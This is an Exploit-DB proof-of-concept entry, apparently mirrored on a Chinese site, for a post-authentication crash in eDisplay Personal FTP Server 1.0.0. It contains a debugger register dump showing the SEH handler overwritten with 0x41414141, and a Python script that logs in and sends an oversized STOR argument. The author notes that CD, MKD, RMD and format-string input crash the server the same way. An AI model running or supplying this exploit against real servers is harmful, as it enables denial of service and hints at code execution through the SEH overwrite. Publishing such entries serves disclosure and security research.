eDisplay Personal FTP Server 1.0.0 – (Authenticated) Multiple Crashs (SEH) (PoC)

• Exploit Database
• 8 阅读

• 作者： loneferret
  日期： 2010-03-19
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/11810/

• # Title: eDisplay Personal FTP server 1.0.0 Multiple Post-Authentication Crash (PoC)
  # From: The eh?-Team || The Great White Fuzz (we're not sure yet)
  # Found by: loneferret
  # Hat's off to dookie2000ca
  # Disvovery date: 16/03/2010
  # Software link: http://edisplay-personal-ftp-server.software.informer.com/
  # Tested on: Windows XP SP3 Professional
  # Nod to the Exploit-DB Team
  
  # Vendor informed via email : 17/03/2010
  
  #THE README PART
  #The STOR command will crash the server and overwrite a few interesting CPU registers (as shown below).
  #Other commands that will gives similar results are: CD / MKD / RMD They all overwrite SEH in the same
  #manner as the STOR command.
  #During our research, we discovered many other DoS possibilities. These character combinations (%s & %n like DELE) 
  #are pretty good at crashing this application.
  #As always, if someone wishes to take this further go right ahead. Play nice, and remember where you got it from.
  #Thank you.
  
  
  #SEH chain of main thread
  #Address SE handler
  #0012C888 41414141
  
  #EAX 7EFEFEFE
  #ECX 0012FEF8 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\AAAAAAAA,,,,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  #EDX 41414141
  #EBX 0139B8D0
  #ESP 0012C30C
  #EBP 0012C894 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...AAAAAAAAAAAAAAAAAAAAAAA\AAAAAAAAAAAAAAAAAA
  #ESI 00000000
  #EDI 0012FFFD
  #EIP 50E14321 FtpSer_1.50E14321
  #C 0 ES 0023 32bit 0(FFFFFFFF)
  #P 1 CS 001B 32bit 0(FFFFFFFF)
  #A 0 SS 0023 32bit 0(FFFFFFFF)
  #Z 1 DS 0023 32bit 0(FFFFFFFF)
  #S 0 FS 003B 32bit 7FFDF000(FFF)
  #T 0 GS 0000 NULL
  #D 0
  #O 0 LastErr ERROR_SUCCESS (00000000)
  #EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
  #ST0 empty %#.19L
  #ST1 empty %#.19L
  #ST2 empty +UNORM 19C4 00000000 7FFDF000
  #ST3 empty -NAN FFFF 805970D5 F6B61A24
  #ST4 empty -UNORM F000 0012FFA8 7FFDF6CC
  #ST5 empty +UNORM 0010 00000000 F6B62000
  #ST6 empty 0.0
  #ST7 empty 45901.499999999995440
  # 3 2 1 0 E S P U O Z D I
  #FST 0100 Cond 0 0 0 1 Err 0 0 0 0 0 0 0 0 (LT)
  #FCW 137F Prec NEAR,64 Mask 1 1 1 1 1 1
  
  #!/usr/bin/python
  
  import socket
  
  buffer= "\x41" * 270
  
  print "Fuzzing CD\r\n"
  s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  connect=s.connect(('xxx.xxx.xxx.xxx',21))
  s.recv(1024)
  s.send('USER test\r\n')
  s.recv(1024)
  s.send('PASS test\r\n')
  s.recv(1024)
  s.send('STOR ' + buffer + '\r\n')
  s.recv(1024)
  s.send('QUIT\r\n')
  s.close